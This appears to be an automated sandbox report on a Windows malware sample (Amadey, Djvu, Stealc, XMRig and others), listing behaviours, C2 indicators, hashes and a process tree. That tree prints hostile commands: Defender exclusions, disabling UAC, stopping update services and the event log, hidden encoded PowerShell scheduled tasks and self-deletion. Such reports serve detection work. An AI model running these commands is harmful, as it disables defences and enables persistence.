Malware Analysis Report

2025-01-02 11:06

Sample ID 240315-cfnqzadg6y
Target 08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe
SHA256 08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856
Tags
amadey djvu smokeloader stealc xmrig pub1 backdoor discovery evasion miner persistence ransomware stealer trojan upx dcrat lumma socks5systemz botnet infostealer rat spyware
score
10/10

Analysis Overview

Threat Level: Known bad

The file 08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe was found to be: Known bad.

Malicious Activity Summary

DcRat

xmrig

Lumma Stealer

UAC bypass

Windows security bypass

Socks5Systemz

Djvu Ransomware

SmokeLoader

Stealc

Amadey

UPX dump on OEP (original entry point)

Detects executables packed with VMProtect.

Detects executables (downloaders) containing URLs to the raw contents of a paste

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Detects executables packed with or using KoiVM

Detects binaries embedding a considerable number of cryptocurrency wallet browser extension IDs.

XMRig Miner payload

Detects binaries embedding a considerable number of MFA browser extension IDs.

Drops file in Drivers directory

Creates new service(s)

Blocklisted process makes network request

Stops running service(s)

Downloads MZ/PE file

Reads user/profile data of web browsers

Reads WinSCP keys stored on the system

Reads local data of messenger clients

Windows security modification

Drops startup file

Loads dropped DLL

Modifies file permissions

Checks BIOS information in registry

Checks computer location settings

Unexpected DNS network traffic destination

Reads data files stored by FTP clients

UPX packed file

Executes dropped EXE

Drops desktop.ini file(s)

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Looks up external IP address via web service

Enumerates connected drives

Checks whether UAC is enabled

Drops Chrome extension

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Program Files directory

Launches sc.exe

Drops file in Windows directory

Program crash

Enumerates physical storage devices

NSIS installer

Checks processor information in registry

Enumerates system info in registry

Creates scheduled task(s)

Runs ping.exe

Modifies data under HKEY_USERS

Suspicious behavior: MapViewOfSection

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Uses Task Scheduler COM API

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of UnmapMainImage

Suspicious use of SetWindowsHookEx

System policy modification

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-15 02:01

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-15 02:01

Reported

2024-03-15 02:03

Platform

win7-20240221-en

Max time kernel

9s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe"

Signatures

Amadey

trojan amadey

Djvu Ransomware

ransomware djvu

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A

xmrig

miner xmrig

Detects binaries embedding a considerable number of MFA browser extension IDs.

Detects binaries embedding a considerable number of cryptocurrency wallet browser extension IDs.

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Detects executables (downloaders) containing URLs to the raw contents of a paste

Detects executables packed with VMProtect.

Detects executables packed with or using KoiVM

UPX dump on OEP (original entry point)

XMRig Miner payload

miner

Creates new service(s)

persistence

Downloads MZ/PE file

Stops running service(s)

evasion

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bsik9hWLX8TuLLCcHcOuy4Am.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyvqQmcj7CKDrZb8pSqlgPeI.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZVjA36lsHqCR8je6lfJdLLai.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\2OH5imM6TnR5CcpBac6BXJ9F.exe N/A
N/A N/A C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

UPX packed file

upx

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1176 set thread context of 2500 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Enumerates physical storage devices

NSIS installer

installer

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1176 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1176 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1176 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1176 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1176 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1176 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1176 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1176 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1176 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1176 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1176 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1176 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1176 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\system32\WerFault.exe
PID 1176 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\system32\WerFault.exe
PID 1176 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\system32\WerFault.exe
PID 2500 wrote to memory of 2312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\SysWOW64\forfiles.exe
PID 2500 wrote to memory of 2312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\SysWOW64\forfiles.exe
PID 2500 wrote to memory of 2312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\SysWOW64\forfiles.exe
PID 2500 wrote to memory of 2312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\SysWOW64\forfiles.exe
PID 2500 wrote to memory of 1484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe
PID 2500 wrote to memory of 1484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe
PID 2500 wrote to memory of 1484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe
PID 2500 wrote to memory of 1484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe
PID 2500 wrote to memory of 1484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe
PID 2500 wrote to memory of 1484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe
PID 2500 wrote to memory of 1484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe

"C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1176 -s 768

C:\Users\Admin\Pictures\2OH5imM6TnR5CcpBac6BXJ9F.exe

"C:\Users\Admin\Pictures\2OH5imM6TnR5CcpBac6BXJ9F.exe"

C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe

"C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe"

C:\Users\Admin\Pictures\NqpPj3yz5Tax23hlO38w94Tb.exe

"C:\Users\Admin\Pictures\NqpPj3yz5Tax23hlO38w94Tb.exe"

C:\Users\Admin\AppData\Local\Temp\is-T9COE.tmp\xu9BFB7O4AHpyqKeeF8VSj4J.tmp

"C:\Users\Admin\AppData\Local\Temp\is-T9COE.tmp\xu9BFB7O4AHpyqKeeF8VSj4J.tmp" /SL5="$6016E,1511216,54272,C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe"

C:\Users\Admin\Pictures\OBvn2pn32QFv2fhf3uItXlPI.exe

"C:\Users\Admin\Pictures\OBvn2pn32QFv2fhf3uItXlPI.exe"

C:\Users\Admin\AppData\Local\Temp\syncUpd.exe

C:\Users\Admin\AppData\Local\Temp\syncUpd.exe

C:\Users\Admin\AppData\Local\Lina Text\linatext.exe

"C:\Users\Admin\AppData\Local\Lina Text\linatext.exe" -i

C:\Users\Admin\Pictures\TbHGazVm41TRJC4RixlqJGgQ.exe

"C:\Users\Admin\Pictures\TbHGazVm41TRJC4RixlqJGgQ.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Lina Text\linatext.exe

"C:\Users\Admin\AppData\Local\Lina Text\linatext.exe" -s

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"

C:\ProgramData\Google\Chrome\updater.exe

C:\ProgramData\Google\Chrome\updater.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\Pictures\koaOpOOsbLJmJTO8gih3cBYb.exe

"C:\Users\Admin\Pictures\koaOpOOsbLJmJTO8gih3cBYb.exe"

C:\Users\Admin\AppData\Local\Temp\7zS344A.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS3ABF.tmp\Install.exe

.\Install.exe /QnjvBdidv "385118" /S

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\4D55.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gPfwHkElh" /SC once /ST 00:26:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gPfwHkElh"

C:\Windows\system32\taskeng.exe

taskeng.exe {518B6E4C-EAEA-46AE-B39B-CFCEE8C5867E} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\DHCFIDAKJD.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GDGHIDBKJE.exe"

C:\Users\Admin\AppData\Local\Temp\DHCFIDAKJD.exe

"C:\Users\Admin\AppData\Local\Temp\DHCFIDAKJD.exe"

C:\Users\Admin\AppData\Local\Temp\8C78.exe

C:\Users\Admin\AppData\Local\Temp\8C78.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\DHCFIDAKJD.exe

C:\Windows\SysWOW64\PING.EXE

ping 2.2.2.2 -n 1 -w 3000

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gPfwHkElh"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bnTqljwkAIckBwCXiX" /SC once /ST 02:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\RRZnTnn.exe\" tC /rmsite_idUkD 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\8C78.exe

C:\Users\Admin\AppData\Local\Temp\8C78.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\f8e83638-66ca-4ebb-8358-3437f89cb012" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Windows\system32\taskeng.exe

taskeng.exe {5A96A6D0-AF67-4A85-94D7-3F1D7F83F748} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\8C78.exe

"C:\Users\Admin\AppData\Local\Temp\8C78.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\8C78.exe

"C:\Users\Admin\AppData\Local\Temp\8C78.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\RRZnTnn.exe

C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\RRZnTnn.exe tC /rmsite_idUkD 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gYIRtCzHc" /SC once /ST 00:19:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gYIRtCzHc"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 104.21.79.77:443 yip.su tcp
US 172.67.34.170:443 pastebin.com tcp
US 8.8.8.8:53 voxel.dofuly.info udp
US 8.8.8.8:53 sty.ink udp
US 8.8.8.8:53 galandskiyher5.com udp
US 8.8.8.8:53 net.geo.opera.com udp
NL 91.92.250.47:80 91.92.250.47 tcp
DE 185.172.128.126:80 185.172.128.126 tcp
NL 91.92.250.47:80 91.92.250.47 tcp
NL 185.26.182.111:80 net.geo.opera.com tcp
US 172.67.200.219:443 sty.ink tcp
NL 185.26.182.111:443 net.geo.opera.com tcp
US 104.21.62.68:80 voxel.dofuly.info tcp
RU 81.94.159.197:80 galandskiyher5.com tcp
US 8.8.8.8:53 564675367.xyz udp
SE 192.229.221.95:80 tcp
SK 45.95.11.69:443 tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 iplogger.com udp
US 172.67.188.178:443 iplogger.com tcp
DE 185.172.128.187:80 185.172.128.187 tcp
DE 185.172.128.145:80 185.172.128.145 tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 trad-einmyus.com udp
RU 81.94.159.197:80 trad-einmyus.com tcp
US 8.8.8.8:53 sdfjhuz.com udp
HN 138.204.181.135:80 sdfjhuz.com tcp
DE 185.172.128.187:80 185.172.128.187 tcp
US 8.8.8.8:53 api.2ip.ua udp
US 172.67.139.220:443 api.2ip.ua tcp
US 8.8.8.8:53 sportessentia.home.pl udp
PL 79.96.138.166:443 sportessentia.home.pl tcp
PL 79.96.138.166:443 sportessentia.home.pl tcp
US 8.8.8.8:53 m2reg.ulm.ac.id udp
ID 103.23.232.80:80 m2reg.ulm.ac.id tcp
US 172.67.139.220:443 api.2ip.ua tcp
HN 138.204.181.135:80 sdfjhuz.com tcp
US 8.8.8.8:53 sajdfue.com udp
KR 211.53.230.67:80 sajdfue.com tcp

Files

SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

\Users\Admin\AppData\Local\Temp\is-ATM40.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\syncUpd.exe

MD5 2dca1d0c0e9f892a717ed02f6e90211a
SHA1 5857f867c5fb4bedc25794c1f960b3c03dfabccf
SHA256 b589fe21a9c02115d64fa8adab169804c69532eb2476132135a568afd179cefb
SHA512 2f84804935e96ba3ced308deaa1c5c8b991b4ab70551b192fbedee36b629b12780d338f84e2ed95e427eb4b93c6def9aa82d15f1d97add3fa8366b620463bd5d

memory/1572-190-0x0000000000250000-0x0000000000251000-memory.dmp

\Users\Admin\AppData\Local\Temp\nsyB878.tmp\INetC.dll

MD5 2b342079303895c50af8040a91f30f71
SHA1 b11335e1cb8356d9c337cb89fe81d669a69de17e
